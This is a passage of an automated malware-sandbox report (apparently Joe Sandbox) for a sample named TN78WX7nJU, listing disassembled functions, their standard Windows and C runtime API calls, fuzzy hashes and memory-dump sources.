                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 024A4ACD
                                                                                                                                                                                                                                                                  • Part of subcall function 024A4D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,024A4800), ref: 024A4DAC
                                                                                                                                                                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 024A4AE2
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024A4AF1
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 024A4AFF
                                                                                                                                                                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 024A4B75
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024A4BB5
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 024A4BC3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3151764488-0
                                                                                                                                                                                                                                                                • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                • Instruction ID: c7ce8f428c2cfad80e7a49426ad3e0874cbc2eccb3bb0d8ae1723269abb717b2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D331B439A002149BCF04EF69C8A1B6EB3B6FF54710F20456BD9159B381DBB0EA05CB94
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                                                                                                                                                                                • Instruction ID: 3d909a4b5b6762711c542bdc472c1f88c6bdb8b3e6dd532265786691cd7f5b8a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0011D631604115BBDB222F77CC589AB7A6DFF82B21B110A2BFC19C7240DB308885CAB0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                                                • Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 024BA331: _free.LIBCMT ref: 024BA35A
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA638
                                                                                                                                                                                                                                                                  • Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
                                                                                                                                                                                                                                                                  • Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA643
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA64E
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA6A2
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA6AD
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA6B8
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024BA6C3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                • Instruction ID: 082890d3969e0dbd7c6e4566ddb332ede1ee3d406a60d49ca7e7f1856f658f1b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1115171644B14AADE32BBB3CC45FCF7BDEDF00B00F40082FA299AA150DAA5B5145E60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A3D1
                                                                                                                                                                                                                                                                  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A3DC
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A3E7
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A43B
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A446
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A451
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A45C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                • Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 02492667
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0249266D
                                                                                                                                                                                                                                                                • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 0249269A
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 024926A4
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 024926B6
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024926CC
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 024926DA
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4227777306-0
                                                                                                                                                                                                                                                                • Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                                                                                                                                                                                • Instruction ID: faecae0fd15cc66c1acda4ae3ac3027a44ce648a615dc82bfdd9fbbbbd9a7793
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A018435501115BBDB24FF66EC48FAF3F6DAF42F52B50042BF905D2560DBA4DD048AA8
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412400
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00412406
                                                                                                                                                                                                                                                                • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412433
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041243D
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041244F
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4227777306-0
                                                                                                                                                                                                                                                                • Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                                                                                                                                                                                • Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0249670B), ref: 024924B6
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024924C4
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024924D2
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0249670B), ref: 02492500
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02492507
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,0249670B), ref: 02492522
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,0249670B), ref: 0249252E
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02492544
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02492552
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                • String ID: kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                                                • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                                                • Instruction ID: bb165416997f65df04b4a2a0e5298a38b4ae3f5dbf9295b6d20412f9f6192be1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5DF086769003103FBB117B757C9991B3FADDD46B32310062BF811E2291EBB589018A58
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Exception@8Throw
                                                                                                                                                                                                                                                                • String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                • API String ID: 2005118841-3619870194
                                                                                                                                                                                                                                                                • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                • Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                • _memcmp.LIBVCRUNTIME ref: 0043116C
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 004311DD
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 004311F6
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431228
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431231
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043123D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorLast$_memcmp
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4275183328-0
                                                                                                                                                                                                                                                                • Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                                                                                                                                                                                • Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024B25EC,00000001,00000001,?), ref: 024B23F5
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024B25EC,00000001,00000001,?,?,?,?), ref: 024B247B
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024B2575
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 024B2582
                                                                                                                                                                                                                                                                  • Part of subcall function 024B390E: RtlAllocateHeap.NTDLL(00000000,0248DAD7,00000000), ref: 024B3940
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 024B258B
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 024B25B0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                • Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                                                                                                                                                                                                                                • Instruction ID: b22284ccdf18279aa4bd1f70a91a509e7ccba57689c2f60cee963e24ae1c1c48
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C51F272A10216ABDB26CF64CC60EEF77AAEF44754F154A2AFC04DA240DBB4DD41CA70
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __cftoe
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4189289331-0
                                                                                                                                                                                                                                                                • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                                                                                                                                                                                • Instruction ID: dfd613974eeed67c34c02fdc6c50891be6922ed9c2229ea5b5d628f82eef36e0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37510832A00205ABDF259FA9DC50BAF77ADEF68334F54427FE825D6281EB31D5018A64
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 024A3051
                                                                                                                                                                                                                                                                  • Part of subcall function 02498AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02498ABD
                                                                                                                                                                                                                                                                • SafeSQueue.LIBCONCRT ref: 024A306A
                                                                                                                                                                                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 024A312A
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024A314B
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 024A3159
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3496964030-0
                                                                                                                                                                                                                                                                • Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                                                                                                                                                                                                                • Instruction ID: db7712c667c082d4243ddbbeb187c6e01706e21f0237bee865d658359b1ef492
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6231DF31A046119FCB25EF69C864BAABBB1FF54710F10859ED9068B255EB70E945CFC0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1687354797-0
                                                                                                                                                                                                                                                                • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                • Instruction ID: f7529a1dacc1a483d70a761c0b941259b6dc09c63a052464892f94b3f8ea3335
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9021A071C21208AADF01FBF9D840BDEBBF9AF09325F54401FE104B7280DB749A448E25
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,024A9038,024A69C9,024C0907,00000008,024C0C6C,?,?,?,?,024A3CB2,?,?,0045A064), ref: 024A904F
                                                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 024A905D
                                                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 024A9076
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,024A9038,024A69C9,024C0907,00000008,024C0C6C,?,?,?,?,024A3CB2,?,?,0045A064), ref: 024A90C8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                • Instruction ID: 2d13900fcbd54f275cd37ca487f3f67ec03d4353d4293964fe3dad73cb3071a9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A01FC3320D7216EA72427B57CA99672755EB357B5B30033FF520493E1EF1288658D85
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,1F633895), ref: 00428DE8
                                                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
                                                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,1F633895), ref: 00428E61
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                • Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 02484FCA
                                                                                                                                                                                                                                                                • int.LIBCPMT ref: 02484FE1
                                                                                                                                                                                                                                                                  • Part of subcall function 0248BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0248BFD4
